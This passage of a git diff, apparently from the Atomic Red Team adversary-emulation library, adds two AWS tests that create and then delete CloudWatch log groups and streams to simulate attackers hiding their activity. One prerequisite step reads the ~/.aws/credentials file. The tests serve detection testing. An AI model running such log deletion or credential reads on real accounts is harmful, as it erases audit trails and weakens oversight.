#{region} --output json + echo "*** Log Group Created ***" + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" + cleanup_command: + name: sh + elevation_required: false + - name: AWS CloudWatch Log Stream Deletes + auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932 + description: "Creates a new cloudWatch log stream in AWS, Upon successful creation + it will Delete the stream. Attackers can use this technique to evade defenses + by \ndeleting the log stream. Once it is deleted, the logs created by the + attackers will not be logged. 
https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html\n" + supported_platforms: + - iaas:aws + input_arguments: + cloudwatch_log_group_name: + description: Name of the cloudWatch log group + type: String + default: test-logs + cloudwatch_log_stream_name: + description: Name of the cloudWatch log stream + type: String + default: '20150601' + region: + description: Name of the region + type: String + default: us-west-2 + dependencies: + - description: 'Check if ~/.aws/credentials file has a default stanza is configured + + ' + prereq_command: 'cat ~/.aws/credentials | grep "default" + + ' + get_prereq_command: 'echo Please install the aws-cli and configure your AWS + defult profile using: aws configure + + ' + executor: + command: | + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" + aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Created ***" + aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Deleted ***" + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" + cleanup_command: + name: sh + elevation_required: false T1564.003: technique: x_mitre_platforms: diff --git a/atomics/T1562.008/T1562.008.md b/atomics/T1562.008/T1562.008.md index 869b1c83..425b5059 100644 --- a/atomics/T1562.008/T1562.008.md +++ b/atomics/T1562.008/T1562.008.md 
@@ -14,6 +14,10 @@ Cloud environments allow for collection and analysis of audit and application lo - [Atomic Test #4 - Disable CloudTrail Logging Through Event Selectors via Stratus](#atomic-test-4---disable-cloudtrail-logging-through-event-selectors-via-stratus) +- [Atomic Test #5 - AWS CloudWatch Log Group Deletes](#atomic-test-5---aws-cloudwatch-log-group-deletes) + +- [Atomic Test #6 - AWS CloudWatch Log Stream Deletes](#atomic-test-6---aws-cloudwatch-log-stream-deletes) +
@@ -261,4 +265,109 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws +
+
+ +## Atomic Test #5 - AWS CloudWatch Log Group Deletes +Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by +deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 89422c87-b57b-4a04-a8ca-802bb9d06121 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| cloudwatch_log_group_name | Name of the cloudWatch log group | String | log-test| +| region | Name of the region | String | us-east-1| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json +echo "*** Log Group Created ***" +aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json +echo "*** Log Group Deleted ***" +``` + + + + +#### Dependencies: Run with `sh`! +##### Description: Check if ~/.aws/credentials file has a default stanza is configured +##### Check Prereq Commands: +```sh +cat ~/.aws/credentials | grep "default" +``` +##### Get Prereq Commands: +```sh +echo Please install the aws-cli and configure your AWS defult profile using: aws configure +``` + + + + +
+
+ +## Atomic Test #6 - AWS CloudWatch Log Stream Deletes +Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by +deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 33ca84bc-4259-4943-bd36-4655dc420932 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| cloudwatch_log_group_name | Name of the cloudWatch log group | String | test-logs| +| cloudwatch_log_stream_name | Name of the cloudWatch log stream | String | 20150601| +| region | Name of the region | String | us-west-2| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json +echo "*** Log Group Created ***" +aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} +echo "*** Log Stream Created ***" +aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} +echo "*** Log Stream Deleted ***" +aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json +echo "*** Log Group Deleted ***" +``` + + + + +#### Dependencies: Run with `sh`! +##### Description: Check if ~/.aws/credentials file has a default stanza is configured +##### Check Prereq Commands: +```sh +cat ~/.aws/credentials | grep "default" +``` +##### Get Prereq Commands: +```sh +echo Please install the aws-cli and configure your AWS defult profile using: aws configure +``` + + + +